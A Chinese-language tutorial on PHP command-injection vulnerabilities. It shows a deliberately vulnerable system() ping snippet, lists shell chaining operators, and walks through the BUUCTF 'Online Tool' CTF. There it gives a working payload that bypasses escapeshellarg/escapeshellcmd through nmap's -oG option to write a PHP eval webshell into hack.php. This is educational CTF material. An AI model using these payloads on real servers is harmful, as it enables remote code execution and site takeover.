概述
??web服务器后端代码有时会调用一些执行系统命令的函数,以常见的php语言为例,使用system/exec/shell_exec/passthru/popen/proc_popen等函数可以执行系统命令。因此一旦我们可以控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。
常见攻击方式
使用管道符号
??我们以一段简单的php代码为例,如下代码所示,程序获取get参数ip,然后拼接到system函数中。
<?php
echo system("ping -c 2 " . $_GET['ip']);
?>
??利用上面的代码和管道符,我们可以轻松执行任意操作系统命令,现将管道符介绍如下。
| 前面语句的执行结果为后面语句的输入
|| 只执行一条语句,前面语句为真,则后一条语句不执行
& 两条语句都执行,前面语句为假不影响后面语句的执行
&& 两条语句都执行,但只有前面为真才不影响后面的语句
; 命令截断符,前面为假不影响后面语句执行
| 前面语句的执行结果为后面语句的输入
|| 同windows,只执行一条语句,前面语句为真,则后面不执行
& 同windows,两条语句都执行,前面为假不影响后面的语句
&& 同windows,两条语句都执行,但只有前面为真才不影响后面的语句
??对比windows和linux,我们发现linux下只比windows多了;截断,然后如果我们想要获取flag的话,可以这样拼接命令127.0.0.1 | cat flag。
escapeshellarg和escapeshellcmd
??这两个函数本来是用于过滤字符使用的,简单理解两个函数的功能就是给参数两边加上单引号,并对我们传入的特殊字符如:引号、管道符进行转义,但仍然存在一些问题,所以这里积累一下。简单总结一下漏洞所在,escapeshellarg是用来过滤参数的,escapeshellcmd是用来过滤命令的,所以一般这两个函数会被配合使用,但一旦这样做就会出现漏洞。
??下面以一道实际的ctf例题进行分析,[BUUCTF 2018]Online Tool,这里做了简化,如下代码所示。代码中用get方式获取host参数,然后就使用了escapeshellarg和escapeshellcmd一起对参数做了过滤处理,此时存在问题,现分析如下。
<?php
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
?>
??做这道题的话无法使用常规的管道符进行命令注入,因为管道符都被转义了,无法达到效果,所以就需要使用nmap命令自身的特性。我们使用nmap的-oG参数,将命令和结果写入到文件中,利用一句话木马来实现攻击。首先构造的payload如下,?host=<?php @eval($_POST["cmd"]);?> -oG hack.php,可以自己写个测试文件,看看经过两个函数后会发现怎样的变化,然后逐步来调试,最终构造的payload如下,之后用蚁剑连接即可。
?host=' <?php @eval($_POST["cmd"]);?> -oG hack.php '
''\\'' \<\?php @eval\(\$_POST\["cmd"\]\)\;\?\> -oG hack.php '\\'''
命令执行漏洞修复
??针对命令执行,这里给出一些建议,首先应该尽量避免使用命令执行函数,其次如果要使用这些函数,那么在接受用户提交的变量时应该做好检测和过滤。
总结
不忘初心,砥砺前行!
|